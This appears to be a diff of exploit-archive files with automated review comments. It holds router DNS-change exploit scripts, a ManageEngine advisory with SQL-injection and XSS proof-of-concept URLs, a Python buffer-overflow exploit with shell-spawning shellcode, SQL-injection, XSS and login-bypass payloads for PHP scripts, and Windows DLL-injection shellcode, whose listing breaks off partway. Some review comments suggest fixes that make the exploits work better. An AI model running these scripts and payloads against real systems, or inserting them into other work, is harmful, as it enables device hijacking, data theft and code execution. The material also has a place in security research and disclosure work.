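for a second vulnerability that the advisory does not claim.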


@ -0,0 +1,83 @@
#!/bin/bash
#
# Pirelli DRG A115 ADSL Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Pirelli DRG A115 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
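Review bot: the final request line has a redirection bug. Bash parses "0&> /dev/null" as a literal argument "0" followed by "&> /dev/null", so lwp-request is handed a second argument "0" (which it treats as another URL) and every byte of output, including any error from the real request, is discarded; the trailing "<&1" then just duplicates /dev/null onto stdin. The script therefore always finishes silently whether or not the device accepted the change, and "-e" (print response headers) is asked for only to be thrown away. Suggest dropping the stray "0" and either letting the headers print or redirecting with ">/dev/null 2>&1" and reporting "$?". Two smaller points: the argument check accepts two arguments, but then "$3" is empty and the request sends "dnsSecondary=", so either document that this clears the secondary server or default it to "$2"; and both "exit;" statements in the error paths return 0, and the captured "GET=`which GET`" value is never used ("command -v GET >/dev/null || { echo ...; exit 1; }" is the idiomatic form).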


@ -0,0 +1,83 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem D840R
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem D840R "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
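Review bot: Neither the affected firmware version nor the vendor's fix status is recorded in the header, so a reader cannot tell which D840R builds expose the unauthenticated dnscfg.cgi endpoint or whether a patched build exists; add an "Affected firmware" and "Vendor status" line next to the description. Two smaller points on the GET line: `0&> /dev/null <&1` is not the redirection that was meant (the stray `0` before `&>` is passed to GET as an extra argument, and `<&1` dups stdout onto stdin), `&> /dev/null` alone discards the output; and the argument check accepts two arguments but then sends an empty `dnsSecondary=` because `$3` is unset in that case.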

platforms/java/webapps/41082.txt Executable file

@ -0,0 +1,191 @@
1. ADVISORY INFORMATION
========================================
Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
Application: ManagEnegine Admanager
Remotely Exploitable: Yes
Authentication Required: Yes
Versions Affected: <= 6.5.40
Technology: Java
Vendor URL: https://www.manageengine.com/products/ad-manager/
Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
Author: Mehmet Ince
Date of found: 08 Jan 2017
2. CREDIT
========================================
Those vulnerabilities was identified during internal penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
3. DETAILS
========================================
3.1 Authenticated Second Order SQL Injection
-----------------------------------------
AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint.
start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)
public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
{
try
{
... OMITTED ...
this.attrbId = request.getParameter("attrId");
this.tableName = request.getParameter("attrTabName");
this.attrbName = request.getParameter("attrbColName");
... OMITTED ...
}
catch (Exception e)
{
e.printStackTrace();
}
}
It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
And then deriveData function are going to be called with class variables that under the adversary control
during complatedAction function execution.
public void completedAction()
{
if (this.updateDetails)
{
... OMITTED ...
deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);
... OMITTED ...
}
... OMITTED ...
}
deriveData function definition is as follow.
public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
{
ArrayList list = new ArrayList();
RelationalAPI relationalAPI = RelationalAPI.getInstance();
Connection connection = null;
try
{
TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
String dataType = colDef.getDataType();
String selctAttrbCol_defaultValue = "'-'";
if (!dataType.equals("CHAR")) {
... OMITTED ...
}
String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
if (!tableName.equalsIgnoreCase(this.baseTableName))
{
String selctAttrbCol = tableName + "." + attrbName;
String parentAttrbCol = this.baseTableName + ".domain_name";
String parentTable = this.baseTableName;String childTable = tableName;
String parentJoinCol = this.baseTableName + ".object_guid";
String childJoinCol = tableName + ".object_guid";
String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";
query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
}
ArrayList result = getResult(query, attrbName);
ArrayList subList = new ArrayList();
if (result.size() > 0)
{
... OMITTED ...
}
if (subList.size() > 0)
{
... OMITTED ...
}
else
{
... OMITTED ...
}
}
catch (Exception e)
{
e.printStackTrace();
}
}
As you can see, database query built with user supplied variable without PDO/ORM.
POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
Vulnerable Parameters: attrTabName, attrbColName
IMPORTANT NOTE:
Since whole process are being called as background job, there is no way to successfully exploitation
with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)
3.2 Reflected Cross-Site Scripting Issues
-----------------------------------------
Issue #1
POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
Parameters: domainName
Issue #2
POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"--></style></scRipt><scRipt>alert(0x03279A)</scRipt>&init=true
Vulnerable Parameters: action
Issue #3
POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"--></style></scRipt><scRipt>alert(0x0328D0)</scRipt>
Vulnerable Parameters: domainName
Issue #4
POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9)
Vulnerable Parameters: waadAccId
Issue #5
POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"--></style></scRipt><scRipt>alert(0x02CB72)</scRipt>
Vulnerable Parameters: actionType
Issue #6
POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"--></style></scRipt><scRipt>alert(0x013AEE)</scRipt>&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
Vulnerable Parameters: objectClass, domainName
Issue #7
POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"--></style></scRipt><scRipt>alert(0x025A20)</scRipt>&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
Vulnerable Parameters: domainName, id, container
Issue #8
POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"--></style></scRipt><scRipt>alert(0x00AE90)</scRipt>&tileName=Compliance Reports
Vulnerable Parameters: reportTab, tileName, categoryId,
Issue #9
POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"--></style></scRipt><scRipt>alert(0x0376D4)</scRipt>&distinguishedName=DC=acme,DC=local
Vulnerable Parameters: domainName, distinguishedName
Issue #10
POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"--></style></scRipt><scRipt>alert(0x041BA0)</scRipt>&permissionType=folder
Vulnerable Parameters: permissionType, domianName
Issue #11
POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"--></style></scRipt><scRipt>alert(0x042402)</scRipt>
Vulnerable Parameters: textField
Issue #12
POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
Vulnerable Parameters: defaultNamingContext,modelName, showDomain
Issue #13
POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"--></style></scRipt><scRipt>alert(0x0437B4)</scRipt>&beanName=undefined&type=single
Vulnerable Parameters: modifyType, beanName
4. TIMELINE
========================================
06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
09 Jan 2017 - Vendor notified.
09 Jan 2017 - Vendor acknowledge the report.
13 Jan 2017 - Vendor replied with patch.
13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)
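Review bot: The advisory never names the fixed build, even though the timeline records a verified patch and links the release notes; add the fixed ADManager Plus build number to section 1 so readers can check their installation against "<= 6.5.40". In 3.1 the remediation remark refers to PDO, which is PHP's database layer; for this Java code the relevant controls are binding values through JDBC PreparedStatement and, since table and column names cannot be bound as parameters, validating attrTabName and attrbColName against the table and column definitions that deriveData already loads through MetaDataUtil.getTableDefinitionByName / getColumnDefinitionByName before they are concatenated into the query string. Also "ManagEnegine" in the title and application lines and "DuplicateComputerLİstener" / "complatedAction" in 3.1 should read "ManageEngine", "DuplicateComputersListener" and "completedAction".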

platforms/linux/local/41076.py Executable file

@ -0,0 +1,63 @@
# Exploit developed using Exploit Pack v7.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: iSelect
# Affected value: -k, --key=KEY
# Version: 1.4.0-2+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ncurses-based interactive line selection tool
# iSelect is an interactive line selection tool, operating via a
# full-screen Curses-based terminal session.
# Kali Linux 2.0 package: pool/main/i/iselect/iselect_1.4.0-2+b1_i386.deb
# MD5sum: d5ace58e0f463bb09718d97ff6516c24
# Website: http://www.ossp.org/pkg/tool/iselect/
# Where in the code:
#7 0xb7eaa69f in __strcpy_chk (dest=0xbfffeccc
"1\243\376\267\070\360\377\277", src=0xbffff388 "=", 'A' <repeats 199
times>..., destlen=1024) at strcpy_chk.c:30
#8 0x0804bfaa in ?? ()
#9 0x0804914d in ?? ()
#10 0xb7dcd276 in __libc_start_main (main=0x8048f50, argc=2,
argv=0xbffff224, init=0x804c020, fini=0x804c090, rtld_fini=0xb7fea8a0
<_dl_fini>, stack_end=0xbffff21c) at ../csu/libc-start.c:291
# Exploit code: Proof of Concept ( Without Fortify )
import os, subprocess
def run():
try:
print "# iSelect - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 1024
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x08\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["iselect -k=",'', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, iSelect binary - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit iSelect - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
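Review bot: `sys.exit(-1)` in howtousage() is called without `import sys`, so the handler would itself raise NameError; add `sys` to the import line. The `except IndexError` around the two print statements can never trigger because nothing in that try block indexes a sequence, so howtousage() is unreachable as written. `os.errno` is not a documented attribute of the os module (it only resolves on Python 2 as an import side effect); use `import errno` and compare against `errno.ENOENT`. The file is Python 2 only (print statements) and the header should say so.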

platforms/php/webapps/41075.txt Executable file

@ -0,0 +1,26 @@
# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
Persistent Cross Site Scripting
# Author : ----------------- : Ahmet Gurel
# Google Dork : --------- : -
# Date : -------------------- : 16/01/2017
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage : http://itechscripts.com/business-networking-script/
# Sofware Price and Demo : $299.00
http://professional-network.itechscripts.com
########## 1-SQL Injection ##########
##### Vulnerable Parameter Type : GET
##### Vulnerable Parameter : gid
##### Vulnerable URL :
http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
##### SQLi Parameter : ' OR '1'='1
########## 2-Persistent XSS Payload ##########
##### Vulnerable URL : http://localhost/[PATH]/home.php
##### Vuln. Parameter: first_name=
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>

platforms/php/webapps/41080.txt Executable file

@ -0,0 +1,64 @@
Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Sofware Price and Demo : $1250
http://photo-sharing.itechscripts.com/
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
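Review bot: The URL for the followBoard.php issue has a doubled slash (`[PATH]//ajax-files/`) while the postComment.php entry uses a single one; make them consistent. "Sofware" in the header is a typo for "Software". The five error-based injection entries repeat one identical payload; stating once that the same probe applies to pid, token, id and brdId, with the method per endpoint, would make the file shorter and easier to map to a fix list.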

platforms/php/webapps/41081.txt Executable file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability: Authentication Bypass
# Date: 16.01.2017
# Vendor Homepage: http://e-topbiz.com/
# Script Name: Million Pixels 3
# Script Buy Now: http://www.e-topbiz.com/oprema/pages/millionpixels3.php
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #


@ -0,0 +1,692 @@
/*
Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
Size: 584 bytes
Date: 16-01-2017
Author: Roziul Hasan Khan Shifat
Tested On : Windows 7 x64
*/
//Note : i wrtie it for process injection
//It may work in exploit
/*
section .text
global _start
_start:
xor r8,r8
push r8
push r8
mov [rsp],dword 'expl'
mov [rsp+4],dword 'orer'
mov [rsp+8],dword '.exe'
lea rcx,[rsp] ;;process name (explorer.exe) change it if U want
push r8
push r8
push r8
mov [rsp],dword 'C:\U'
mov [rsp+4],dword 'sers'
mov [rsp+8],dword '\Pub'
mov [rsp+12],dword 'lic\'
mov [rsp+16],dword 'in.d'
mov [rsp+20],word 'll'
lea rdx,[rsp] ;path of the dll (change it to U full path of dll)
;--------------------------------------------------------
mov r8w,336
sub rsp,r8
lea r12,[rsp]
push 24
pop r8 ;(important: length of dll path string including null byte)
mov [r12],rcx ;process name
mov [r12+8],rdx ;dll path
mov [r12+16],r8 ;length of dll path string
;----------------------------------------------------------
_main:
cdq
mov rax,[gs:rdx+0x60] ;peb
mov rax,[rax+0x18] ;peb->Ldr
mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address
;------------------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)
mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
add rsi,rdi
;-------------------------------------------------------
;loading msvcrt.dll
cdq
push rdx
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi
mov [rsp],dword 'msvc'
mov [rsp+4],word 'rt'
lea rcx,[rsp]
sub rsp,88
call rbx
;-------------------------------
;Finding address of strcmp()
lea rdx,[rsp+88]
mov [rdx],dword 'strc'
mov [rdx+4],word 'mp'
mov rcx,rax
mov r8w,587*4
mov ebx,[rsi+r8]
add rbx,rdi
call rbx
;-----------------------------
mov [r12+24],rax ;address of strcmp()
;---------------------------------------------------------------
mov dx,190*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateToolhelp32Snapshot()
;--------------------------------
;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
xor rdx,rdx ;DWORD th32ProcessID
push 2
pop rcx ;DWORD dwFlags
call rbx
mov r13,rax ;HANDLE
cmp r13,-1
je __exit
;---------------------------------------------
mov dx,304
mov [r12+32],dword edx ;sizeof PROCESSENTRY32
mov dx,920*4
mov ebx,[rsi+rdx]
add rbx,rdi ;rbx=Process32First()
;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
mov rcx,r13 ;HANDLE hSnapshot
call rbx
cmp rax,1
jne __exit
;---------------------------------------------------
xor rdx,rdx
mov dx,922*4
mov r15d,[rsi+rdx]
add r15,rdi ;r15=Process32Next()
sub rsp,88
get_pid:
lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
mov rdx,[r12] ;process name
mov rbx,[r12+24] ;strcmp()
call rbx
xor rdx,rdx
cmp rax,rdx
jz inject
;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
mov rcx,r13
lea rdx,[r12+32]
call r15
cmp rax,1
je get_pid
leave
ret
__exit:
xor rdx,rdx
push rdx
mov dx,297*4
mov ebx,[rsi+rdx]
add rbx,rdi
pop rcx
call rbx
;--------------------------------------------------
;------------------------------------------------------
;inject function
inject:
xor rdx,rdx
push rdx
pop r10
mov r10w,899*4
mov ebx,[rsi+r10]
add rbx,rdi ;rbx=OpenProcess()
;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)
push rdx
pop rcx
mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID
;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)
mov ecx,0x1e84800a
sub ecx,0x1e65700b
call rbx
mov r13,rax ;PROCESS HANDLE
cmp r13,-1
je __exit
;--------------------------------------------------------------------
mov dx,1279
mov ebx,[rsi+rdx*4]
add rbx,rdi ;VirualAlloc()
;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
sub rsp,88
mov rcx,r13 ;HANDLE hProcess
xor rdx,rdx ;LPVOID lpAddress
mov r8,[r12+16] ;SIZE_T dwSize
mov r9w,0x2fff
inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
call rbx
mov r14,rax ;LPVOID address
xor rdx,rdx
cmp rax,rdx
jz __exit
;-----------------------------------------------------------------------------------
mov dx,1347
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WriteProcessMemory()
sub rsp,88
xor rdx,rdx
;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
mov rcx,r13 ;HANDLE hProcess
mov rdx,r14 ;LPVOID lpBaseAddress
mov r8,[r12+8] ;LPCVOID lpBuffer
mov r9,[r12+16] ;SIZE_T nSize
call rbx
cmp rax,1
jne __exit
;------------------------------------------------------------------------------------
mov dx,170*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateRemoteThread()
xor rdx,rdx
sub rsp,88
;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
mov rcx,r13 ;HANDLE hProcess
push rdx
push rdx
pop r8 ;SIZE_T dwStackSize
mov dx,832
mov r9d,[rsi+rdx*4]
add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())
pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
mov [rsp+32],r14 ;LPVOID lpParameter
mov [rsp+40],r8
mov [rsp+48],r8
call rbx
call __exit
;------------------------------------------------------------
*/
/*
dll_inj.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 4d 31 c0 xor %r8,%r8
3: 41 50 push %r8
5: 41 50 push %r8
7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
15: 72
16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
1d: 65
1e: 48 8d 0c 24 lea (%rsp),%rcx
22: 41 50 push %r8
24: 41 50 push %r8
26: 41 50 push %r8
28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
36: 73
37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
3e: 62
3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
46: 5c
47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
4e: 64
4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
56: 48 8d 14 24 lea (%rsp),%rdx
5a: 66 41 b8 50 01 mov $0x150,%r8w
5f: 4c 29 c4 sub %r8,%rsp
62: 4c 8d 24 24 lea (%rsp),%r12
66: 6a 18 pushq $0x18
68: 41 58 pop %r8
6a: 49 89 0c 24 mov %rcx,(%r12)
6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
73: 4d 89 44 24 10 mov %r8,0x10(%r12)
0000000000000078 <_main>:
78: 99 cltd
79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
7e: 48 8b 40 18 mov 0x18(%rax),%rax
82: 48 8b 70 10 mov 0x10(%rax),%rsi
86: 48 ad lods %ds:(%rsi),%rax
88: 48 8b 30 mov (%rax),%rsi
8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
8f: b2 88 mov $0x88,%dl
91: 8b 5f 3c mov 0x3c(%rdi),%ebx
94: 48 01 fb add %rdi,%rbx
97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
9a: 48 01 fb add %rdi,%rbx
9d: 8b 73 1c mov 0x1c(%rbx),%esi
a0: 48 01 fe add %rdi,%rsi
a3: 99 cltd
a4: 52 push %rdx
a5: 66 ba 40 03 mov $0x340,%dx
